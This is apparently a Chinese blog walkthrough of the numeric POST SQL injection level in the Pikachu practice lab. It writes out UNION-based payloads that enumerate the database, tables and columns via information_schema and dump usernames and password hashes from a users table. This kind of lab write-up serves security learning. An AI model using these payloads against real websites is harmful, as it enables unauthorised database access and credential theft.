pikachu靶场之SQL注入

一、数字型注入(post)

1、确认是否有注入点

抓包改为1=1:

而改成1=2,则

因此存在注入点,并判断是数字型注入(题目也说明了),不需要闭合符

2、找列

id=1 order by 1

直到order by 3,出错:Unknown column '3' in 'order clause' 

 

因此,确定为两列

3、判断每列显示的位置 

4、查询数据库名和数据库版本

id=-2 union select database(),version()

 

版本5.7.26(mysql5.0以上版本自带information_schema表 )

5、查询所有表

id=-2 union select group_concat(table_name),2 from information_schema.tables where table_schema='pikachu'

 

6、查询敏感表users表中所有列

id=-2 union select group_concat(column_name),2 from information_schema.columns where table_schema='pikachu' and table_name='users'

 

7、查询用户名和密码

id=-2 union select group_concat(username),group_concat(password) from users

8、将查到的密码解密

如,admin对应123456

 

则成功注入,获得用户名和密码。

参考:pikachu靶场全15关通过教程-CSDN博客 

  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值